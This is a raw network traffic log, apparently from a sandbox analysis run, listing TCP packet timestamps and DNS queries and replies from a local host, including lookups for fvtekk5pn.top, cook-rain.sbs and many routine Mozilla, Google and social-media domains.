                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.081228971 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.081271887 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.082176924 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.082274914 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.082310915 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.083101988 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.083156109 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.083210945 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.085931063 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.095098972 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.095205069 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.095207930 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.095335960 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.095537901 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.095623970 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.095695972 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.095763922 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.096580982 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.096676111 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.096703053 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.096762896 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.097543955 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.097876072 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.097942114 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.097986937 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.098854065 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.098902941 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.099020004 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.099085093 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.099857092 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.099906921 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.099972963 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.100933075 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.100996017 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.101028919 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.101146936 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.101974964 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.102050066 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.102087975 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.102818966 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.102967978 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.103044987 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.103116989 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.103950024 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.104008913 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.104094028 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.104120970 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.104263067 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.105012894 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.105114937 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.105134010 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.105237007 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.106060982 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.106132030 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.106209040 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.106268883 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.107050896 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.107239962 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.107350111 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.107409954 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.108079910 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.108150959 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.108191013 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.108268976 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.109096050 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:27.109163046 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.723815918 CET192.168.2.41.1.1.10x159eStandard query (0)home.fvtekk5pn.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.723978996 CET192.168.2.41.1.1.10xdf3fStandard query (0)home.fvtekk5pn.top28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:30.776212931 CET192.168.2.41.1.1.10x1f5aStandard query (0)cook-rain.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:49.115246058 CET192.168.2.41.1.1.10x692eStandard query (0)fvtekk5pn.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:49.115247011 CET192.168.2.41.1.1.10xe904Standard query (0)fvtekk5pn.top28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:50.473121881 CET192.168.2.41.1.1.10xd7d4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:50.473392010 CET192.168.2.41.1.1.10xbf41Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:52.803961039 CET192.168.2.41.1.1.10x131eStandard query (0)fvtekk5pn.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:52.804037094 CET192.168.2.41.1.1.10x84bdStandard query (0)fvtekk5pn.top28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.491868973 CET192.168.2.41.1.1.10x93dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.491975069 CET192.168.2.41.1.1.10x3215Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.928961992 CET192.168.2.41.1.1.10xf253Standard query (0)prod.classify-client.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:55.156783104 CET192.168.2.41.1.1.10xa4b6Standard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:59.805037022 CET192.168.2.41.1.1.10xa621Standard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:59.805227041 CET192.168.2.41.1.1.10x7b6fStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.031867027 CET192.168.2.41.1.1.10x6cd4Standard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.032447100 CET192.168.2.41.1.1.10x3105Standard query (0)prod.detectportal.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.259242058 CET192.168.2.41.1.1.10xf03aStandard query (0)youtube.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.259921074 CET192.168.2.41.1.1.10x82b7Standard query (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.509782076 CET192.168.2.41.1.1.10xb15dStandard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:13.159610987 CET192.168.2.41.1.1.10x4d1aStandard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:14.588596106 CET192.168.2.41.1.1.10xf4edStandard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:14.833909988 CET192.168.2.41.1.1.10xb719Standard query (0)contile.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:15.022727013 CET192.168.2.41.1.1.10xaf7dStandard query (0)spocs.getpocket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:15.253118992 CET192.168.2.41.1.1.10x221bStandard query (0)prod.ads.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:15.482851982 CET192.168.2.41.1.1.10xcbf5Standard query (0)prod.ads.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:15.552942991 CET192.168.2.41.1.1.10x694aStandard query (0)prod.balrog.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:15.813098907 CET192.168.2.41.1.1.10xc5c0Standard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:16.569813967 CET192.168.2.41.1.1.10xba39Standard query (0)example.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:16.570719957 CET192.168.2.41.1.1.10x25aeStandard query (0)ipv4only.arpaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:16.773977995 CET192.168.2.41.1.1.10x8704Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:16.774698973 CET192.168.2.41.1.1.10x5641Standard query (0)content-signature-2.cdn.mozilla.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:17.004654884 CET192.168.2.41.1.1.10xdfe1Standard query (0)prod.content-signature-chains.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:17.233967066 CET192.168.2.41.1.1.10xff38Standard query (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:20.440948009 CET192.168.2.41.1.1.10x6f5aStandard query (0)shavar.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:22.853524923 CET192.168.2.41.1.1.10x6c0bStandard query (0)fvtekk5pn.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:22.853565931 CET192.168.2.41.1.1.10x88b4Standard query (0)fvtekk5pn.top28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:31.148627996 CET192.168.2.41.1.1.10xc0d8Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:31.148740053 CET192.168.2.41.1.1.10x7d22Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:34.032222033 CET192.168.2.41.1.1.10x5175Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:34.033216953 CET192.168.2.41.1.1.10x4464Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.157669067 CET192.168.2.41.1.1.10x187Standard query (0)support.mozilla.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.224551916 CET192.168.2.41.1.1.10x853eStandard query (0)firefox.settings.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.224852085 CET192.168.2.41.1.1.10xf245Standard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.387145996 CET192.168.2.41.1.1.10x41c9Standard query (0)us-west1.prod.sumo.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.542790890 CET192.168.2.41.1.1.10xe1abStandard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.543445110 CET192.168.2.41.1.1.10x6a41Standard query (0)services.addons.mozilla.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.546116114 CET192.168.2.41.1.1.10x734fStandard query (0)prod.remote-settings.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.706383944 CET192.168.2.41.1.1.10x3078Standard query (0)us-west1.prod.sumo.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.774425983 CET192.168.2.41.1.1.10x347cStandard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.836831093 CET192.168.2.41.1.1.10x9d93Standard query (0)prod.remote-settings.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:38.993237972 CET192.168.2.41.1.1.10x3678Standard query (0)telemetry-incoming.r53-2.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.047137022 CET192.168.2.41.1.1.10x969Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.094582081 CET192.168.2.41.1.1.10x628Standard query (0)services.addons.mozilla.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.221633911 CET192.168.2.41.1.1.10x5619Standard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:39.347743034 CET192.168.2.41.1.1.10xd4c2Standard query (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.690187931 CET192.168.2.41.1.1.10xa651Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.690634012 CET192.168.2.41.1.1.10x72bdStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.691054106 CET192.168.2.41.1.1.10x32b1Standard query (0)www.wikipedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.924360991 CET192.168.2.41.1.1.10x4febStandard query (0)star-mini.c10r.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.924437046 CET192.168.2.41.1.1.10xc4acStandard query (0)youtube-ui.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:42.924806118 CET192.168.2.41.1.1.10x9d76Standard query (0)dyna.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.153635025 CET192.168.2.41.1.1.10x161eStandard query (0)dyna.wikimedia.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.154417992 CET192.168.2.41.1.1.10x2961Standard query (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.155225992 CET192.168.2.41.1.1.10xc9aStandard query (0)star-mini.c10r.facebook.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.384951115 CET192.168.2.41.1.1.10xe548Standard query (0)www.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.386600018 CET192.168.2.41.1.1.10x4903Standard query (0)twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.615506887 CET192.168.2.41.1.1.10x522cStandard query (0)reddit.map.fastly.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.619944096 CET192.168.2.41.1.1.10xacaeStandard query (0)twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.852813005 CET192.168.2.41.1.1.10x26cbStandard query (0)reddit.map.fastly.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:43.857410908 CET192.168.2.41.1.1.10xe52bStandard query (0)twitter.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:45.659893036 CET192.168.2.41.1.1.10xd55aStandard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:56.965972900 CET192.168.2.41.1.1.10x66e0Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:58.281845093 CET192.168.2.41.1.1.10x47beStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:07.305610895 CET192.168.2.41.1.1.10x3737Standard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:18.583347082 CET192.168.2.41.1.1.10x33c9Standard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:12:18.813157082 CET192.168.2.41.1.1.10xbb81Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:00.072086096 CET192.168.2.41.1.1.10x7b44Standard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:00.304738998 CET192.168.2.41.1.1.10x6d21Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:01.622940063 CET192.168.2.41.1.1.10xfdcStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:13:14.317611933 CET192.168.2.41.1.1.10xbe7Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:09.778409958 CET192.168.2.41.1.1.10x9f7bStandard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:10.999401093 CET192.168.2.41.1.1.10xff82Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:21.874414921 CET192.168.2.41.1.1.10x317dStandard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:22.102902889 CET192.168.2.41.1.1.10x155fStandard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:22.329905987 CET192.168.2.41.1.1.10xa9faStandard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:12.584719896 CET192.168.2.41.1.1.10xeb0fStandard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:16:15.700366020 CET192.168.2.41.1.1.10xbfb2Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:04.397305965 CET192.168.2.41.1.1.10x97cStandard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:04.629024029 CET192.168.2.41.1.1.10xb58eStandard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:04.860665083 CET192.168.2.41.1.1.10x9c12Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:06.128873110 CET192.168.2.41.1.1.10xd2bStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:25.500679970 CET192.168.2.41.1.1.10x2b13Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:17:34.049276114 CET192.168.2.41.1.1.10x6ff5Standard query (0)cook-rain.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:03.529283047 CET192.168.2.41.1.1.10x5e3eStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:03.529392958 CET192.168.2.41.1.1.10x2ee0Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:18:04.794621944 CET192.168.2.41.1.1.10x5650Standard query (0)cook-rain.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.536858082 CET1.1.1.1192.168.2.40x159eNo error (0)home.fvtekk5pn.top34.116.198.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:31.046928883 CET1.1.1.1192.168.2.40x1f5aNo error (0)cook-rain.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:31.046928883 CET1.1.1.1192.168.2.40x1f5aNo error (0)cook-rain.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:50.053509951 CET1.1.1.1192.168.2.40x692eNo error (0)fvtekk5pn.top34.116.198.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:50.698833942 CET1.1.1.1192.168.2.40xd7d4No error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:50.699117899 CET1.1.1.1192.168.2.40xbf41No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:53.320888042 CET1.1.1.1192.168.2.40x131eNo error (0)fvtekk5pn.top34.116.198.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.719099998 CET1.1.1.1192.168.2.40x93dNo error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.719419956 CET1.1.1.1192.168.2.40x3215No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.923912048 CET1.1.1.1192.168.2.40x874cNo error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:55.156048059 CET1.1.1.1192.168.2.40xf253No error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.030808926 CET1.1.1.1192.168.2.40xa621No error (0)youtube.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.031338930 CET1.1.1.1192.168.2.40x7b6fNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.031338930 CET1.1.1.1192.168.2.40x7b6fNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.258610010 CET1.1.1.1192.168.2.40x6cd4No error (0)youtube.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.259277105 CET1.1.1.1192.168.2.40x3105No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.485166073 CET1.1.1.1192.168.2.40xf03aNo error (0)youtube.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.485939980 CET1.1.1.1192.168.2.40x82b7No error (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.733670950 CET1.1.1.1192.168.2.40xf182No error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.733670950 CET1.1.1.1192.168.2.40xf182No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:11:00.735389948 CET1.1.1.1192.168.2.40xb15dNo error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
